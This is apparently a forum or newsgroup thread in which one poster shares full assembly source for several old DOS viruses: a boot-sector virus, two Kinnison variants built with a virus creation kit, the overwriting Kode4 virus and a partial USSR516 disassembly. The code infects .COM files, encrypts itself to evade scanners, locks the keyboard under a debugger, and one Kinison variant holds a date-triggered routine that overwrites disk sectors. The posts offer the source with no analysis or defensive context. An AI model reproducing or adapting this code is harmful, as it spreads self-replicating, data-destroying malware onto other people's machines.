;Ok, system file is there, so load it
SYSTEM_THERE:
MOV AX,WORD PTR [DISK_BUF+1CH] ;get file size of
IBMBIO.COM/IO.SYS
XOR DX,DX
DIV WORD PTR [SEC_SIZE] ;and divide by sector
size
INC AL ;ax=number of sectors
to read
MOV BP,AX ;store that number in
BP
MOV AX,WORD PTR [DOS_ID] ;get sector number of
start of data
PUSH AX
MOV BX,700H ;set disk read buffer
to 0000:0700
RD_BOOT1: MOV AX,WORD PTR [DOS_ID] ;and get sector to read
CALL CONVERT ;convert to bios
Trk/Cyl/Sec info
MOV AL,1 ;read one sector
CALL READ_DISK ;go read the disk
SUB BP,1 ;subtract 1 from number
of sectors to read
JZ DO_BOOT ;and quit if we're done
ADD WORD PTR [DOS_ID],1 ;add sectors read to
sector to read
ADD BX,WORD PTR [SEC_SIZE] ;and update buffer
address
JMP RD_BOOT1 ;then go for another

;Ok, the first system file has been read in, now transfer control to it
DO_BOOT:
MOV CH,BYTE PTR [DISK_ID] ;Put drive type in ch
MOV DL,BYTE PTR [DRIVE] ;Drive number in dl
POP BX
; JMP FAR PTR LOAD ;use the nicer far jump
if compiling with MASM or TASM
MOV AX,0070H ;A86 is too stupid to
handle that,
PUSH AX ;so let's fool it with
a far return
XOR AX,AX
PUSH AX
RETF

;Convert sequential sector number in ax to BIOS Track, Head, Sector
information.
;Save track number in DX, sector number in CH,
CONVERT:
XOR DX,DX
DIV WORD PTR [SECS_PER_TRK] ;divide ax by sectors
per track
INC DL ;dl=sector number to
start read on, al=track/head count
MOV CH,DL ;save it here
XOR DX,DX
DIV WORD PTR [HEADS] ;divide ax by head
count
MOV BYTE PTR [HEAD],DL ;dl=head number, save
it
MOV DX,AX ;ax=track number, save
it in dx
RET

;Read the disk for the number of sectors in al, into the buffer es:bx, using
;the track number in DX, the head number at HEAD, and the sector
;number at CH.
READ_DISK:
MOV AH,2 ;read disk command
MOV CL,6 ;shift possible upper 2
bits of track number to
SHL DH,CL ;the high bits in dh
OR DH,CH ;and put sector number
in the low 6 bits
MOV CX,DX
XCHG CH,CL ;ch (0-5) = sector, cl,
ch (6-7) = track
MOV DL,BYTE PTR [DRIVE] ;get drive number from
here
MOV DH,BYTE PTR [HEAD] ;and head number from
here
INT 13H ;go read the disk
ERROR3: JC ERROR3 ;hang in case of an
error
RET

;Move data that doesn't change from this boot sector to the one read in at
;DISK_BUF. That includes everything but the DRIVE ID (at offset 7DFDH) and
;the data area at the beginning of the boot sector.
MOVE_DATA:
MOV SI,OFFSET DSKBASETBL ;Move all of the boot
sector code after the data area
MOV DI,OFFSET DISK_BUF + (OFFSET DSKBASETBL - OFFSET
BOOTSEC)
MOV CX,OFFSET DRIVE - OFFSET DSKBASETBL
REP MOVSB
MOV SI,OFFSET BOOTSEC ;Move the initial jump
and the sector ID
MOV DI,OFFSET DISK_BUF
MOV CX,11
REP MOVSB
RET

;Display the null terminated string at MESSAGE.
DISP_MSG:
MOV SI,OFFSET MESSAGE ;set offset of message
up
DM1: MOV AH,0EH ;Execute BIOS INT 10H,
Fctn 0EH (Display Char)
LODSB ;get character to
display
OR AL,AL
JZ DM2 ;repeat until 0
INT 10H ;display it
JMP SHORT DM1 ;and get another
DM2: RET

SYSFILE_1: DB 'IBMBIO COM' ;PC DOS System file
SYSFILE_2: DB 'IO SYS' ;MS DOS System file
MESSAGE: DB 'Kilroy was here!',0DH,0AH,0AH,0

ORG 7DFDH

DRIVE: DB 0 ;Disk drive (A or C)
for this sector

BOOT_ID: DW 0AA55H ;Boot sector ID word

MAIN ENDS

END START

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Hе так страшен черт, как его малютка.

John Zaicev

unread,

May 15, 2012, 2:15:08 AM5/15/12

to

[√] Привет _All_ !

; KINNISON.ASM -- Sam Kinnison virus
; Created by Nowhere Man's Virus Creation Labratory v0.75
; Written by Nowhere Man

virus_type equ 0

code segment 'CODE'
assume cs:code,ds:code,es:code,ss:code
org 0100h

main proc near
flag: mov ah,0
nop
nop

jmp start ; Would be at start of victim
nop
nop
start: call find_offset ; Push IP on to stack, advance IP
find_offset: pop di ; DI holds old IP
sub di,3 ; Adjust for length of CALL

lea si,[di + start_of_code - start] ; SI points to code
call encrypt_decrypt ; Decrypt the code

start_of_code label near

push di ; Save DI
mov si,offset flag ; SI points to flag bytes
lea di,[di + new_jump - start] ; DI points to start of jump
movsw ; Transfer two bytes
movsw ; Transfer two bytes
pop di ; Restore DI
push di ; And save it for later
lea si,[di + buffer - start]; SI points to old start
mov di,0100h ; DI points to start of code
movsw ; Transfer two bytes
movsw ; Transfer two bytes
movsw ; Transfer two bytes
movsb ; Transfer final byte
pop di ; Restore DI

mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack

mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack

mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h

call get_day
cmp ax,000Bh
jne end00
call get_weekday
cmp ax,0005h
jne end00
mov cx,0003h
call beep
end00: xor ah,ah ; BIOS get time function
int 01Ah
test dx,0001h
jne no_infection
call search_files
no_infection:
call get_day
cmp ax,000Bh
jne end01
call get_weekday
cmp ax,0005h
jne end01
lea si,[di + data00 - start] ; SI points to data
call display_string
end01: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h

mov sp,bp ; Deallocate local buffer

mov di,0100h ; Push 0100h on to stack for
push di ; return to main program

xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;

ret ; Return to original program
main endp

search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack

mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h

mov ah,03Bh ; DOS change directory function
lea dx,[di + root - start] ; DX points to root directory
int 021h

call traverse ; Start the traversal

mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h

mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller

root db "\",0 ; Root directory
search_files endp

traverse proc near
push bp ; Save BP

mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address

mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack

mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h

mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
mov dx,offset all_files ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present

check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going

mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h

call traverse ; Recursively call ourself

mov ah,03Bh ; DOS change directory function
lea dx,[di + up_dir - start]; DX points to parent directory
int 021h

another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file

leave_traverse:
lea dx,[di + com_mask - start] ; DX points to "*.COM"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h

pop bp ; Restore BP
ret ; Return to caller

up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
com_mask db "*.COM",0 ; Mask for all .COM files
traverse endp

find_files proc near
push bp ; Save BP

mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address

mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack

push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h

mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file

done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h

pop bp ; Restore BP
ret ; Return to caller
find_files endp

infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA

mov ax,04301h ; DOS set file attributes function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h

mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle

mov ah,03Fh ; DOS read from file function
mov cx,7 ; CX holds bytes to read (7)
lea dx,[di + buffer - start]; DX points to buffer
int 021h

push si ; Save DTA address before compare
mov byte ptr [di + set_carry - start],0 ; Assume we'll fail
lea si,[di + buffer - start]; SI points to comparison buffer
push di ; Save virus offset
lea di,[di + new_jump - start] ; DI points to virus flag
mov cx,4 ; CX holds number of bytes (4)
rep cmpsb ; Compare the first four bytes
pop di ; Restore DI
je close_it_up ; If equal then close up
mov byte ptr [di + set_carry - start],1 ; Success -- the file is OK

cwd ; Zero CX _ Zero bytes from start
mov cx,dx ; Zero DX /
mov ax,04200h ; DOS file seek function, start
int 021h

mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h

sub ax,7 ; Prepare for JMP
mov word ptr [di + new_jump + 5 - start],ax ; Construct JMP for later

call encrypt_code ; Make an encrypted copy of ourself

mov ah,040h ; DOS write to file function
mov cx,finish - start ; CX holds virus length
lea dx,[di + finish - start] ; DX points to encrypted copy
int 021h

cwd ; Zero DX _ Zero bytes from start
mov cx,dx ; Zero CX /
mov ax,04200h ; DOS file seek function, start
int 021h

mov ah,040h ; DOS write to file function
mov cx,7 ; CX holds bytes to write (7)
lea dx,[di + new_jump - start] ; DX points to the jump we made
int 021h

close_it_up: pop si ; Restore DTA address

mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h

mov ah,03Eh ; DOS close file function
int 021h

mov ax,04301h ; DOS set file attributes function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h

infection_done: cmp byte ptr [di + set_carry - start],1 ; Set carry flag if
failed
ret ; Return to caller

set_carry db ? ; Set-carry-on-exit flag
buffer db 5 dup (090h),0CDh,020h ; Buffer to hold test data
new_jump db 4 dup (?),0E9h,?,? ; New jump to virus
infect_file endp

beep proc near
jcxz beep_end ; Exit if there are no beeps

mov ax,0E07h ; BIOS display char., BEL
beep_loop: int 010h ; Beep
loop beep_loop ; Beep until --CX = 0

beep_end: ret ; Return to caller
beep endp

display_string proc near
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend: ret ; Return to caller
display_string endp

get_day proc near
mov ah,02Ah ; DOS get date function
int 021h
mov al,dl ; Copy day into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_day endp

get_weekday proc near
mov ah,02Ah ; DOS get date function
int 021h
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_weekday endp

data00 db "DIE BITCH!!!!! AHHHHHHHH!!!!!!!",13,10,0

vcl_marker db "[VCL]",0 ; VCL creation marker

note db "Dedicated to the memory of"
db " Sam Kinnison 1954-1992",0
db "[Kinnison]",0
db "Nowhere Man, [NuKE] '92",0
encrypt_code proc near
push bx ; Save BX

push di ; Save DI
lea si,[di + encrypt_decrypt - start] ; SI points to encryption code

xor ah,ah ; BIOS get time function
int 01Ah
or dx,1 ; Insure we never get zero
mov word ptr [si + 5],dx ; Low word of timer is new key

alter_flag: mov al,0 ; AL holds alteration flag
inc byte ptr [di + (alter_flag + 1) - start] ; Toggle alteration flag

test al,1 ; Is bit one set?
jne check_nop ; If not then don't toggle

xor byte ptr [si],0110b ; Change all BPs in startup code
xor byte ptr [si + 4],010b ; to BXs, and vice-versa
xor byte ptr [si + 7],0110b ;

check_nop: test al,2 ; Is bit two set?
jne do_encryption ; If not then don't toggle

mov ax,word ptr [si + 7] ; AX holds INC/NOP
xchg ah,al ; Exchange position of INC and NOP
mov word ptr [si + 7],ax ; Put the word back

do_encryption: mov si,di ; SI points to start of code
lea di,[di + finish - start] ; DI points past code
mov cx,(finish - start) / 2 ; CX holds words to transfer
rep movsw ; Copy the code past the end

pop di ; Restore DI
lea si,[di + (finish + (start_of_code - start)) - start] ; SI points to code
to encrypt
call encrypt_decrypt ; Encrypt the code

pop bx ; Restore BX
ret ; Return to caller
encrypt_code endp

even ; Must be on an even boundry

end_of_code label near

encrypt_decrypt proc near
mov bp,end_of_code - start_of_code - 2 ; BP holds length of code
xor_loop: db 081h,032h,00h,00h ; XOR a word with the key
dec bp ; Do the next byte
nop ; Used to throw off detectors
jne xor_loop ; Repeat until we're done
ret ; Return to caller
encrypt_decrypt endp
finish label near

code ends
end main

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Пришел. Увидел. Побелил.

John Zaicev

unread,

May 15, 2012, 2:14:50 AM5/15/12

to

[√] Привет _All_ !

; KINISON.ASM -- Sam Kinsion Virus
; Created with Nowhere Man's Virus Creation Laboratory v1.00
; Written by Nowhere Man

virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR

code segment byte public

assume cs:code,ds:code,es:code,ss:code
org 0100h

main proc near

db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host

call encrypt_decrypt ; Decrypt the virus

start_of_code label near

lea si,[bp + buffer] ; SI points to original start

mov di,0100h ; Push 0100h on to stack for
push di ; return to main program

movsw ; Copy the first two bytes
movsb ; Copy the third byte

mov di,bp ; DI points to start of virus

mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack

mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack

mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h

stop_tracing: mov cx,09EBh
mov ax,0FE05h ; Acutal move, plus a HaLT
jmp $-2
add ah,03Bh ; AH now equals 025h
jmp $-10 ; Execute the HaLT
lea bx,[di + null_vector] ; BX points to new routine
push cs ; Transfer CS into ES
pop es ; using a PUSH/POP
int 021h
mov al,1 ; Disable interrupt 1, too
int 021h
jmp short skip_null ; Hop over the loop
null_vector: jmp $ ; An infinite loop
skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged
lock_keys: mov al,128 ; Change here screws DEBUG
out 021h,al ; If tracing then lock keyboard

call get_day
cmp ax,000Bh ; Did the function return 11?
jne skip00 ; If not equal, skip effect
call get_weekday
cmp ax,0005h ; Did the function return 5?
jne skip00 ; If not equal, skip effect
jmp short strt00 ; Success -- skip jump
skip00: jmp end00 ; Skip the routine
strt00: lea si,[di + data00] ; SI points to data

mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend:

end00: xor ah,ah ; BIOS get time function
int 01Ah

xchg dx,ax ; AX holds clock ticks
mov cx,0003h ; We'll divide by 3
cwd ; Sign-extend AX into DX:AX
div cx ; Divide AX by CX
or dx,dx ; Is there a remaindier?
jne no_infection ; If there is then don't spread
call search_files ; Find and infect a file
no_infection:
call get_day
cmp ax,000Bh ; Did the function return 11?
jne skip01 ; If not equal, skip effect
call get_weekday
cmp ax,0005h ; Did the function return 5?
jne skip01 ; If not equal, skip effect
jmp short strt01 ; Success -- skip jump
skip01: jmp end01 ; Skip the routine
strt01: mov ax,0004h ; First argument is 4
mov cx,0010h ; Second argument is 16
cli ; Disable interrupts (no Ctrl-C)
cwd ; Clear DX (start with sector 0)
trash_loop: int 026h ; DOS absolute write interrupt
dec ax ; Select the previous disk
cmp ax,-1 ; Have we gone too far?
jne trash_loop ; If not, repeat with new drive
sti ; Restore interrupts

end01:
com_end: pop dx ; DX holds original DTA address

mov ah,01Ah ; DOS set DTA function
int 021h

mov sp,bp ; Deallocate local buffer

xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;

ret ; Return to original program
main endp

db 09Ch,054h,068h,09Eh,06Ch

search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack

mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h

mov ah,03Bh ; DOS change directory function

lea dx,[di + root] ; DX points to root directory

int 021h

call traverse ; Start the traversal

mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h

mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller

root db "\",0 ; Root directory
search_files endp

traverse proc near
push bp ; Save BP

mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address

mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack

mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h

mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes

lea dx,[di + all_files] ; DX points to "*.*"

int 021h
jc leave_traverse ; Leave if no files present

check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going

mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h

call traverse ; Recursively call ourself

pushf ; Save the flags

mov ah,03Bh ; DOS change directory function

lea dx,[di + up_dir] ; DX points to parent directory
int 021h
popf ; Restore the flags

jnc done_searching ; If we infected then exit

another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file

leave_traverse:

lea dx,[di + com_mask] ; DX points to "*.COM"

call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h

pop bp ; Restore BP
ret ; Return to caller

up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
com_mask db "*.COM",0 ; Mask for all .COM files
traverse endp

db 083h,01Dh,064h,0E6h,08Ah

db 039h,01Ch,0DDh,0C2h,0DDh

infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA

mov byte ptr [di + set_carry],0 ; Assume we'll fail

cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit

size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name

int 021h
xchg bx,ax ; BX holds file handle

mov ah,03Fh ; DOS read from file function

mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h

mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h

xchg dx,ax ; Faster than a PUSH AX

mov ah,03Eh ; DOS close file function
int 021h

xchg dx,ax ; Faster than a POP AX

sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump

mov ax,04301h ; DOS set file attrib. function

xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h

mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle

mov ah,040h ; DOS write to file function

mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h

mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h

push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI

mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h

mov ah,03Eh ; DOS close file function
int 021h

mov ax,04301h ; DOS set file attrib. function

xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h

infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed

ret ; Return to caller

set_carry db ? ; Set-carry-on-exit flag

buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp

db 087h,04Ch,0B3h,047h,001h

get_day proc near
mov ah,02Ah ; DOS get date function
int 021h
mov al,dl ; Copy day into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_day endp

db 0FFh,024h,0C3h,092h,07Fh

get_weekday proc near
mov ah,02Ah ; DOS get date function
int 021h
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_weekday endp

data00 db 7,7,7,"DIE BITCH!!!!! AHHHHHHHH!!!!!!!",13,10,0

vcl_marker db "[VCL]",0 ; VCL creation marker

note db "This *VIRUS* is dedecated to t"
db "he memory of Sam Kinsion, 1954"
db "-1992",0
db "[Kinison]",0

db "Nowhere Man, [NuKE] '92",0

encrypt_code proc near

push bp ; Save BP
mov bp,di ; Use BP as pointer to code
lea si,[bp + encrypt_decrypt]; SI points to cipher routine

xor ah,ah ; BIOS get time function
int 01Ah

mov word ptr [si + 9],dx ; Low word of timer is new key

xor byte ptr [si + 1],8 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)

lea di,[bp + finish] ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes

lea si,[bp + write_stuff] ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes

pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again

mov ah,040h ; DOS write to file function

lea dx,[bp + start] ; DX points to virus

lea si,[bp + finish] ; SI points to routine
call si ; Encrypt/write/decrypt

mov di,bp ; DI points to virus again

pop bp ; Restore BP
ret ; Return to caller

write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp

end_of_code label near

encrypt_decrypt proc near

lea si,[bp + start_of_code] ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through

ret ; Return to caller
encrypt_decrypt endp
finish label near

code ends
end main

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Снегири не гири, барсуки не суки.

John Zaicev

unread,

May 17, 2012, 8:01:58 AM5/17/12

to

[√] Привет _All_ !

─────────═════════>>> Article From Evolution #2 - YAM '92

Article Title: Kode 4 v1 Virus
Author: Soltan Griss

;######################################################################
;# Name: Kode4 version 1.0 (overwritting stage)
;# Author: Soltan Griss [YAM]
;#
;# Description: What this sucker does is very simple. it overwrites
;# the first 46 bytes of all com files in the current
;# directory, with it's own code... as of scanv93, this
;# virus is undetectable..
;#
;#
;# Special Thanks go out to Data Disruptor.. If it were not for you i
;# would still be fucking lost!!!!
;#
;######################################################################

seg_a segment byte public
assume cs:seg_a, ds:seg_a

org 100h
V_Length equ last-start
KODE4 proc far

start label near ;Check for Virex installiation

mov ax,0ff0fh
int 21h
cmp ax,0101h ;Abort if Virex Protection
je done ; present

mov ah,4Eh ;Find first Com file
mov dx,offset filename ;use "*.com"
int 21h

Back:
mov ah,43h ;get rid of read only
mov al,0
mov dx,9eh
int 21h
mov ah,43h
mov al,01
and cx,11111110b
int 21h

mov ax,3D01h ;Open file for writing
mov dx,9Eh ;get file name from file DTA
int 21h

mov bx,ax ;save handle in bx
mov ah,57h ;get time date
mov al,0
int 21h

push cx ;put in stack for later
push dx

mov dx,100h ;Start writing at 100h
mov cl,v_length ;write 46 bytes
mov ah,40h ;Write Data into the file
int 21h

pop dx ;Restore old dates and times
pop cx
mov ah,57h
mov al,01h
int 21h

mov ah,3Eh ;Close the file
int 21h

mov ah,4Fh ;Find Next file
int 21h

jnc Back
mov ah,9h
mov dx,offset DATA
int 21h

done: int 20h ;Terminate Program
filename db "*.c*",0
DATA db " -=+ Kode4 +=-, The one and ONLY!$"

kode4 endp
LAST label near
seg_a ends
end start

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Ученье - свет, а неученье - приятный полумрак.

John Zaicev

unread,

May 17, 2012, 8:02:30 AM5/17/12

to

[√] Привет _All_ !

ussr516 segment byte public
assume cs:ussr516, ds:ussr516
org 100h
; Disassembled by Dark Angel of PHALCON/SKISM
; for 40Hex Number 7 Volume 2 Issue 3
stub: db 0e9h, 0, 0
db 0e9h, 1, 0, 0
; This is where the virus really begins
start:
push ax
call beginvir

orig4 db 0cdh, 20h, 0, 0
int30store db 0, 0, 0, 0 ; Actually it's int 21h
; entry point
int21store db 0, 0, 0, 0

beginvir: pop bp ; BP -> orig4
mov si,bp
mov di,103h
add di,[di-2] ; DI -> orig4
movsw ; restore original
movsw ; 4 bytes of program
xor si,si
mov ds,si
les di,dword ptr ds:[21h*4]
mov [bp+8],di ; int21store
mov [bp+0Ah],es
lds di,dword ptr ds:[30h*4+1] ; Bug????
findmarker:
inc di
cmp word ptr [di-2],0E18Ah ; Find marker bytes
jne findmarker ; to the entry point
mov [bp+4],di ; and move to
mov [bp+6],ds ; int30store
mov ax,5252h ; Get list of lists
int 21h ; and also ID check

add bx,12h ; Already installed?
jz quitvir ; then exit
push bx
mov ah,30h ; Get DOS version
int 21h

pop bx ; bx = 12, ptr to 1st
; disk buffer
cmp al,3
je handlebuffer ; if DOS 3
ja handleDBHCH ; if > DOS 3
inc bx ; DOS 2.X, offset is 13
handlebuffer:
push ds
push bx
lds bx,dword ptr [bx] ; Get seg:off of buffer
inc si
pop di
pop es ; ES:DI->seg:off buff
mov ax,[bx] ; ptr to next buffer
cmp ax,0FFFFh ; least recently used?
jne handlebuffer ; if not, go find it
cmp si,3
jbe quitvir
stosw
stosw
jmp short movetobuffer
handleDBHCH: ; Disk Buffer Hash Chain Head array
lds si,dword ptr [bx] ; ptr to disk buffer
lodsw ; info
lodsw ; seg of disk buffer
; hash chain head array
inc ax ; second entry
mov ds,ax
xor bx,bx
mov si,bx
lodsw ; EMS page, -1 if not
; in EMS
xchg ax,di ; save in di
lodsw ; ptr to least recently
; used buffer
mov [di+2],ax ; change disk buffer
; backward offset to
; least recently used
xchg ax,di ; restore EMS page
mov [di],ax ; set to least recently
movetobuffer: ; used
mov di,bx
push ds
pop es ; ES:DI -> disk buffer
push cs
pop ds
mov cx,108h
lea si,[bp-4] ; Copy from start
rep movsw
mov ds,cx ; DS -> interrupt table
mov word ptr ds:[4*21h],0BCh ; New interrupt handler
mov word ptr ds:[4*21h+2],es ; at int21
quitvir:
push cs ; CS = DS = ES
pop es
push es
pop ds
pop ax
mov bx,ax
mov si, 100h ; set up stack for
push si ; the return to the
retn ; original program
int24:
mov al,3 ; Ignore all errors
iret
tickstore db 3 ; Why???
buffer db 3, 0, 9, 0

int21:
pushf
cli ; CP/M style call entry
call dword ptr cs:[int30store-start]
retn ; point of int 21h

int21DSDX: ; For int 21h calls
push ds ; with
lds dx,dword ptr [bp+2] ; DS:DX -> filename
call int21
pop ds
retn

cmp ax,4B00h ; Execute
je Execute
cmp ax,5252h ; ID check
je CheckID
cmp ah,30h ; DOS Version
je DosVersion
callorig21: ; Do other calls
jmp dword ptr cs:[int21store-start]
DosVersion: ; Why????? ; DOS Version
dec byte ptr cs:[tickstore-start]
jnz callorig21 ; Continue if not 0
push es
xor ax,ax
push ax
mov es,ax
mov al,es:[46Ch] ; 40h:6Ch = Timer ticks
; since midnight
and al,7 ; MOD 15
inc ax
inc ax
mov cs:[tickstore-start],al ; # 2-17
pop ax
pop es
iret
CheckID: ; ID Check
mov bx,0FFEEh ; FFEEh = -12h
iret
Execute: ; Execute
push ax ; Save registers
push cx
push es
push bx
push ds ; DS:DX -> filename
push dx ; save it on stack
push bp
mov bp,sp ; Set up stack frame
sub sp,0Ah ; Temporary variables
; [bp-A] = attributes
; [bp-8] = int 24 off
; [bp-6] = int 24 seg
; [bp-4] = file time
; [bp-2] = file date
sti
push cs
pop ds
mov ax,3301h ; Turn off ^C check
xor dl,dl ; (never turn it back
call int21 ; on. Bug???)
